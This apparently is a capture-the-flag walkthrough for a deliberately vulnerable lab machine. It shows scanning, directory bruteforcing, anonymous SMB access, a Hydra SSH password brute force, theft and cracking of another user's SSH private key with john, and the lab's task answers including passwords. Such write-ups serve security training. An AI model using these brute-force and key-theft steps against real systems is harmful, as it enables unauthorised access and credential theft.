Setting-up
Task 1: Deploy the machine and connect to our network
Task 2: Deploy the machine and connect to our network
Reconnaissance
1
sudo nmap -sV -sC -O <ip-addr>
Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-08 02:12 EST
Nmap scan report for 10.10.66.136
Host is up (0.31s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db45cbbe4a8b71f8e93142aefff845e4 (RSA)
| 256 09b9b91ce0bf0e1c6f7ffe8e5f201bce (ECDSA)
|_ 256 a5682b225f984a62213da2e2c5a9f7c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-title: Apache Tomcat/9.0.7
|_http-favicon: Apache Tomcat
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| smb2-time:
| date: 2022-12-08T07:13:00
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2022-12-08T02:12:59-05:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.99 seconds
1
2
3
4
5
6
7
8
Port service version
22/tcp ssh OpenSSH 7.2p2 Ubuntu 4ubuntu 2.4
80/tcp http Apache/2.4.18 (Ubuntu)
139/tcp netbios Samba smbd 3.X - 4.X
445/tcp netbios Samba smbd 4.3.11-ubuntu
8009/tcp ajp13 Apache Jserv
8080/tcp http Apache Tomcat/9.0.7
Directory bruteforcing
To find out hidden directory we need to perform directory bruteforcing by using tools such as gobuster , dirbuster etc In this case we are using gobuster!
1
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <target-ip>
- -w wordlists to a common directories
- -u Target url
- dir Directory bruteforce mode
Results :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.66.136
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/08 02:02:32 Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 318] [--> http://10.10.66.136/development/]
Progress: 4760 / 220561 (2.16%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/08 02:05:01 Finished
===============================================================
Task 3: What is the name of the hidden directory on the web server(enter name without /)?
1
development
visit
/development
Letβs check the content of the both!
dev.txt
j.txt
As we guessed earlier, here are the dev notes. Apparently, the webserver usersβ usernames start with βjβ and βkβ. We can definitely use this information in the future. In addition, Mr. K said that the βSMB has been configured.β which was proved by the Nmap scan
SMB Enumeration
1
1
2
cd /usr/share/nmap/scripts
nmap --script=smb-enum* <target-ip>
Results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
nmap --script=smb-enum* 10.10.66.136
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-08 02:39 EST
Nmap scan report for 10.10.66.136
Host is up (0.30s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.66.136\Anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\samba\anonymous
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.66.136\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Samba Server 4.3.11-Ubuntu)
| Users: 3
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
|_ Current user access: READ/WRITE
| smb-enum-sessions:
|_ <nobody>
| smb-enum-domains:
| BASIC2
| Groups: n/a
| Users: n/a
| Creation time: unknown
| Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
| Account lockout disabled
| Builtin
| Groups: n/a
| Users: n/a
| Creation time: unknown
| Passwords: min length: 5; min age: n/a days; max age: n/a days; history: n/a passwords
|_ Account lockout disabled
Nmap done: 1 IP address (1 host up) scanned in 327.23 seconds
Β Β As we can clearly see, there are Anonymous and $IPC hidden shares. The $IPC share enables inter process communication as well as anonymous user login which requires no username or password. We can leverage this to our advantage by using the smbclient command and getting access to the anonymous share.
1
smbclient //target-ip/anonymous
smbimage dir goes ihere
staff.txt might contain some useful information, so letβs get it into our computer with get staff.txt command.
1
cat staff.txt
1
2
3
4
5
6
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
It seems weβve found βkβ and βjβ users first showed up in the dev notes. As the SSH port is open and we know that Jan has a weak password from the Kay note (j.txt), letβs run hydra for cracking Janβs password and getting inside the server.
Task 4: Use brute-forcing to find the username & password
Task 5: What is the username?
1
jan
SSH Bruteforcing
To brute force username and password Hydra is the best tool!
1
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<target-ip>
- -l username
- -P password ``` βββ(rootγΏkali)-[/usr] ββ# hydra -l jan -P share/wordlists/rockyou ssh://10.10.66.136 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-08 03:04:02 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://10.10.66.136:22/ [STATUS] 128.00 tries/min, 128 tries in 00:01h, 14344273 to do in 1867:45h, 14 active [STATUS] 98.67 tries/min, 296 tries in 00:03h, 14344105 to do in 2422:60h, 14 active [STATUS] 94.00 tries/min, 658 tries in 00:07h, 14343743 to do in 2543:14h, 14 active [22][ssh] host: 10.10.66.136 login: jan password: armando ^C
1
2
3
4
5
6
7
> From this point we can login to the machine using **jan** and **armando** through ssh
Task 6: What is the password?
armando
1
Task 7: What service do you use to access the server(answer in abbreviation in all caps)?
SSH
1
2
3
4
5
6
7
Task 8: Enumerate the machine to find any vectors for privilege escalation
## Gaining access through SSH
```sh
ssh jan@<target-ip>
Type password as armando
we got access!!
Privilege Escalation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
jan@basic2:~$ cd ../kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
jan@basic2:/home/kay$
Go to .ssh folder
1
cd .ssh
Here you can see all rsa keys for kay . So now the task is to get those keys onto our computer! which we can transfer using rsync or scp commands.
else just use cat id_rsa and copy and save that into your computer
1
ssh2john <id_rsa-file-you-copied.txt> >> hash.txt
1
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Here you go we got a password!!!
1
2
3
4
5
6
7
8
9
10
11
rockyoun forjohn.txt --wordlist=/usr/share/wordlists/
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (/home/local_host/id_rsa.txt)
1g 0:00:00:00 DONE (2022-12-08 03:31) 25.00g/s 2068Kp/s 2068Kc/s 2068KC/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Login to kayβs account now!
1
chmod 700 id_rsa.txt
1
ssh kay@<target-ip>
passphrase for key id_rsa.txt is beeswax
Mission Accomplished!!
Task 9: What is the name of the other user you found(all lower case)?
1
kay
Task 10: If you have found another user, what can you do with this information?
Task 11: What is the final password you obtain?
1
heresareallystrongpasswordthatfollowsthepasswordpolicy$$